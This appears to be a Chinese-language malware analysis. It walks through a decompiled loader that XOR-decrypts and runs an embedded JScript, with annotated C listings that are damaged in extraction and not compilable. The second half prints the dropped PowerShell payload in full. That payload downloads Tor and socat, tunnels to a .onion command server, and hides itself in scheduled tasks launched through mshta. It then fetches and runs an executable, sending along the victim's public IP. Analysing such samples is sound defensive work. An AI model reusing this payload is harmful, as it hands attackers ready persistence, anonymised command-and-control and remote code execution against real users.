// Loader entry point, as a Hex-Rays style decompiler listing that was damaged in
// extraction: `ST20_4`/`ST18_4` are decompiler residue, `v3` is used without a
// declaration, and the `argv`/`envp` parameters have lost their pointer types.
// The text below is therefore not compilable as shown; it is kept verbatim.
//
// What the listing shows: copy an embedded, XOR-encrypted JScript blob into a
// heap buffer, decrypt it in place, then hand it to an in-process Active
// Scripting (JScript) engine. Nothing is written to disk in this function, so
// the plain-text script is only observable in memory after decrypt_code()
// returns (or by re-applying the XOR routine to the embedded blob statically).
int __cdecl main(int argc, const char argv, const char envp)
{ST20_4
// Script-engine handle returned by init_com() (project type, not shown here).
JSEngine v4 ; //ST18_4
unsigned int i ; //[esp+1Ch] [ebp-14h]
// Payload descriptor: a {size, js_code} pair (8 bytes in this 32-bit build).
encry_code *a2 ; //[esp+20h] [ebp-10h]
FreeConsole(); // detach the console so the process runs without a visible window
a2 = operator new ( 8u); // one size field plus one pointer
a2 ->size = 0x14C88; // fixed payload length: 0x14C88 = 85128 bytes
a2 ->js_code = operator new[] ( a2->size);
// Byte-wise copy of the encrypted payload out of the global `encrypt_code`
// array (defined elsewhere in the binary; not part of this listing).
for ( i = 0 ; i < a2 ->size; ++ i)
a2 ->js_code[ i ] = encrypt_code [ i];
// In-place XOR decrypt of every byte except the last one -- presumably a
// terminating NUL that is left intact; confirm against the embedded blob.
decrypt_code ( a2 ->js_code, a2 ->size - 1);
// 16-byte block handed to init_com(). The two-argument memset() is extraction
// damage; 0x10 matches the allocation size, so the missing argument is most
// likely the fill value (probably 0) -- verify in the binary.
v3 = operator new ( 0x10u);
memset ( v3 , 0x10u);
v4 = init_com ( v3); // COM / Active Scripting engine setup
run_jscript ( v4 , a2); // execute the decrypted JScript in-process
// Unnamed routine called last on the engine handle; presumably teardown, unverified.
sub_862F90 ( v4);
return 0;
}
解密方式也比较简单,主要就是通过xor来解密
// Payload decryptor: a 4-byte repeating XOR applied in place over `size` bytes
// of `a1`. Decompiler listing, damaged in extraction: `a1` is indexed below and
// so must be a pointer (the `*` was lost), `{edx` is residue, the line that
// assigns the key seed lost its left-hand side and callee name, and `v2` is
// used without a declaration. Kept verbatim; not compilable as shown.
//
// a1   -- buffer to decrypt (modified in place)
// size -- number of bytes to process
// returns: whatever was last assigned to `result` -- the last byte written, or
//          4 (from the key loop) when size is 0; the caller ignores it.
_BYTE __cdecl decrypt_code(char a1, unsigned int size)
{edx
_BYTE result ; //eax
// Key seed; its four bytes become the XOR key below.
unsigned int v4 ; //[esp+0h] [ebp-1Ch]
// 4-byte key, indexed v5[0..3] below.
_BYTE v5 ; //[esp+10h] [ebp-Ch]
unsigned int i ; //[esp+14h] [ebp-8h]
unsigned int j ; //[esp+18h] [ebp-4h]
// Key seed computation. What survives extraction shows v4 derived from
// 0x7FFFFFFF, the constant 8 and a call taking (size, 6). Since `size` is the
// only input, the key looks like a pure function of the payload length, i.e.
// recoverable from the binary alone without executing it -- confirm by
// reversing the garbled callee.
= 0x7FFFFFFF - 8 fun ( size , 6);
// The 1-byte allocation and the `LOBYTE(result) = 4; v2 = 4;` pair read like
// mis-decompiled setup of the 4-byte key rather than real heap use; treat as
// residue and do not rely on it.
result = operator new ( 1u);
v5 = result;
v2 = result;
LOBYTE ( result ) = 4 ; v2 = 4;
// generate the xor key: key[i] = byte i of v4 (little-endian byte order)
for ( i = 0 ; i < 4 ; ++ i)
{
v5 [ i ] = v4 >> 8 * i;
result = ( i + 1);
}
// a1[j] ^= key[j % 4]. Because the key repeats every 4 bytes, the known
// leading bytes of any script (whitespace, `var`, `function`, ...) are enough
// to recover it even without the seed, which is what makes static extraction
// of the embedded payload straightforward for an analyst.
for ( j = 0 ; j < size ; ++ j)
{
result = ( v5 [ j % 4 ] ^ a1 [ j]);
a1 [ j ] = result;
}
return result;
}
1. CoCreateInstance()创建javascript的引擎,获得jscript引擎的接口的IActiveScript 2. 实现回调调用接口IActiveScriptSite,通过IActiveScript->SetScriptSite()交给脚本回调 3. IActiveScript->QueryInterface()取得IActiveScriptParse接口,IActiveScriptParse接口用来解析执行jscript脚本
脚本会释放出一个powershell脚本,可能是c2c连接已经失效,后续的行为没跑出来
$SH_TYPE_SCHEDULED_TASK=1; $SH_TYPE_TASK_SCHEDULER=2; $schedulerType=$SH_TYPE_SCHEDULED_TASK; function FVRClsggMRAZ { param([string]$zipfile, [string]$destination); $7z = Join-Path $env:ALLUSERSPROFILE '7za.exe'; if (-NOT (Test-Path $7z)){ Try { (New-Object System.Net.WebClient).DownloadFile('https://chocolatey.org/7za.exe',$7z); } Catch{} } if ($(Try { Test-Path $7z.trim() } Catch { $false })){ Start-Process "$7z" -ArgumentList "x -o`"$destination`" -y `"$zipfile`"" -Wait -NoNewWindow } else{ $shell = new-object -com shell.application; $zip = $shell.NameSpace($zipfile); foreach($item in $zip.items()) { $shell.Namespace($destination).copyhere($item); } } } function Base64ToFile { param([string]$file, [string]$string); $bytes=[System.Convert]::FromBase64String($string); #set-content -encoding byte $file -value $bytes; [IO.File]::WriteAllBytes($file, $bytes); } function RandomString{ param([int]$min=5, [int]$max=15); return (-join ((48..57)+(65..90)+(97..122) | Get-Random -Count (Get-Random -minimum $min -maximum $max) | % {[char]$_})); } function InitScheduller{ try{ Import-Module ScheduledTasks -ErrorAction Stop; return $SH_TYPE_SCHEDULED_TASK; }catch{ $File=$env:Temp+'/'+(RandomString)+'.zip'; $Dest=$env:Temp+'/'+(RandomString); while (!(iGgRLcyIJQBzrA 'https://api.nuget.org/packages/taskscheduler.2.5.23.nupkg' $File)) {} if ((Test-Path $Dest) -eq 1){Remove-Item -Force -Recurse $Dest;}mkdir $Dest | Out-Null; FVRClsggMRAZ $File $Dest; Remove-Item -Force $File; $TSAssembly=$Dest+'/lib/net20/Microsoft.Win32.TaskScheduler.dll'; $loadLib = [System.Reflection.Assembly]::LoadFile($TSAssembly); return $SH_TYPE_TASK_SCHEDULER; } } function xrnOlrj { param([string]$name, [string]$cmd, [string]$params='',[int]$restart=0,[int]$delay=0,[string]$dir=''); switch ($schedulerType) { $SH_TYPE_SCHEDULED_TASK { $Action = New-ScheduledTaskAction -Execute $cmd; if(-Not [String]::IsNullOrEmpty($params)){ $Action.Arguments=$params; } if(-Not [String]::IsNullOrEmpty($dir)){ 
$Action.WorkingDirectory=$dir; } $LogonTrigger = New-ScheduledTaskTrigger -AtLogOn; try{ $LogonTrigger.UserId=$env:username; }catch{ $LogonTrigger.User=$env:username; } if(-Not $delay -eq 0){ $LogonTrigger.Delay=New-TimeSpan -Seconds $delay; } if($restart -eq 1){ $TimeTrigger = New-ScheduledTaskTrigger -Once -At 12am -RepetitionInterval ([System.TimeSpan]::FromMinutes(1)) -RepetitionDuration ([System.TimeSpan]::FromDays(365 * 20)); } $Settings = New-ScheduledTaskSettingsSet; $Settings.DisallowStartIfOnBatteries = $False; $Settings.StopIfGoingOnBatteries = $False; if($restart -eq 1){ $Task = Register-ScheduledTask -Action $Action -Trigger $LogonTrigger,$TimeTrigger -Settings $Settings -TaskName $name -Description (RandomString); }else{ $Task = Register-ScheduledTask -Action $Action -Trigger $LogonTrigger -Settings $Settings -TaskName $name -Description (RandomString); } Start-ScheduledTask -InputObject $Task; }; Default { $ts=New-Object Microsoft.Win32.TaskScheduler.TaskService; $td=$ts.NewTask(); $td.RegistrationInfo.Description = (RandomString); $td.Settings.DisallowStartIfOnBatteries = $False; $td.Settings.StopIfGoingOnBatteries = $False; $td.Settings.MultipleInstances = [Microsoft.Win32.TaskScheduler.TaskInstancesPolicy]::IgnoreNew; $LogonTrigger = New-Object Microsoft.Win32.TaskScheduler.LogonTrigger; $LogonTrigger.StartBoundary=[System.DateTime]::Now; $LogonTrigger.UserId=$env:username; $LogonTrigger.Delay=[System.TimeSpan]::FromSeconds($delay); $td.Triggers.Add($LogonTrigger); if($restart -eq 1){ $TimeTrigger = New-Object Microsoft.Win32.TaskScheduler.TimeTrigger; $TimeTrigger.StartBoundary=[System.DateTime]::Now; $TimeTrigger.Repetition.Interval=[System.TimeSpan]::FromMinutes(1); $TimeTrigger.Repetition.StopAtDurationEnd=$False; $td.Triggers.Add($TimeTrigger); } $tsf="Microsoft.Win32.TaskScheduler"; $ExecAction=New-Object "$tsf.ExecAction"($cmd,$params,$dir); $td.Actions.Add($ExecAction); $task=$ts.RootFolder.RegisterTaskDefinition($name, $td); $task.Run(); 
}; } } function iGgRLcyIJQBzrA { param([string]$AETLcnitKnaNqr, [string]$aEntsBMtsayB); $ErrorActionPreference = "Stop"; Write-Host ("Download {0} to {1}" -f ($AETLcnitKnaNqr, $aEntsBMtsayB)); try { Start-BitsTransfer -Source $AETLcnitKnaNqr -Destination $aEntsBMtsayB; } catch { #Write-Error $_ -ErrorAction Continue; try { (New-Object System.Net.WebClient).DownloadFile($AETLcnitKnaNqr,$aEntsBMtsayB); } catch { #Write-Error $_ -ErrorAction Continue; Start-Process "cmd.exe" -ArgumentList "/b /c bitsadmin /transfer /download /priority HIGH `"$AETLcnitKnaNqr`" `"$aEntsBMtsayB`"" -Wait -WindowStyle Hidden; } }finally{ $ErrorActionPreference = "Continue"; } if ( $(Try { Test-Path $aEntsBMtsayB.trim() } Catch { $false })){ return $true; } return $false; } function IwoPMc{ $schedulerType = InitScheduller; $tf=$env:Temp+'/'+(RandomString)+'.zip'; $DestTP=$env:ALLUSERSPROFILE+'/'+(RandomString); $TorMirrors=@("https://dist.torproject.org/", "https://torproject.mirror.metalgamer.eu/dist/", "https://tor.ybti.net/dist/"); foreach ($mirror in $TorMirrors) { $_url=$mirror+'torbrowser/7.0.11/tor-win32-0.3.1.9.zip'; if((iGgRLcyIJQBzrA $_url $tf)){ break; } } if ((Test-Path $DestTP) -eq 1){Remove-Item -Force -Recurse $DestTP;}mkdir $DestTP | Out-Null; FVRClsggMRAZ $tf $DestTP; Remove-Item -Force $tf; $ykF=$DestTP+'/Tor/'; $WqPfv="vbscript:close(CreateObject(`"WScript.Shell`").Run(`"tor.exe`",0,False))"; xrnOlrj (RandomString) 'mshta.exe' $WqPfv 0 0 $ykF; $SFile=$env:Temp+'/'+(RandomString)+'.zip'; while (!(iGgRLcyIJQBzrA 'https://github.com/StudioEtrange/socat-windows/archive/1.7.2.1.zip' $SFile)){} FVRClsggMRAZ $SFile $DestTP; $s_old=$DestTP+'/socat-windows-1.7.2.1/'; $s_new=(RandomString); Remove-Item -Force $SFile; Rename-Item -path $s_old -newName $s_new; $dLkdOdvs=$DestTP+'/'+$s_new+'/'; $s1cmd='socat tcp4-LISTEN:5555,reuseaddr,fork,keepalive,bind=127.0.0.1 SOCKS4A:127.0.0.1:qr5c2etn6x5lhhfc.onion:80,socksport=9050'; $s2cmd='socat 
tcp4-LISTEN:5588,reuseaddr,fork,keepalive,bind=127.0.0.1 SOCKS4A:127.0.0.1:qr5c2etn6x5lhhfc.onion:5588,socksport=9050'; $SyASxV="vbscript:close(CreateObject(`"WScript.Shell`").Run(`"$s1cmd`",0,False))"; $CkeHaEMoQb="vbscript:close(CreateObject(`"WScript.Shell`").Run(`"$s2cmd`",0,False))"; xrnOlrj (RandomString) 'mshta.exe' $SyASxV 0 0 $dLkdOdvs; xrnOlrj (RandomString) 'mshta.exe' $CkeHaEMoQb 0 0 $dLkdOdvs; $wXdRbCFwn="vbsc"+"ript:close(CreateObject(`"WScript.Shell`").Run(`"powershell.exe `"`"`$F=`$env:Temp+'//"+(RandomString)+".exe';rm -Force `$F;`$cl=(New-Object Net.WebClient);`$cl.DownloadFile('http://127.0.0.1:5555/"+(RandomString)+".asp?ts&ip='+`$cl.Download`"+`"String('http://api.ipify.org/'),`$F);& `$F`"`"`",0,False))"; xrnOlrj (RandomString) 'mshta.exe' $wXdRbCFwn 1; } IwoPMc;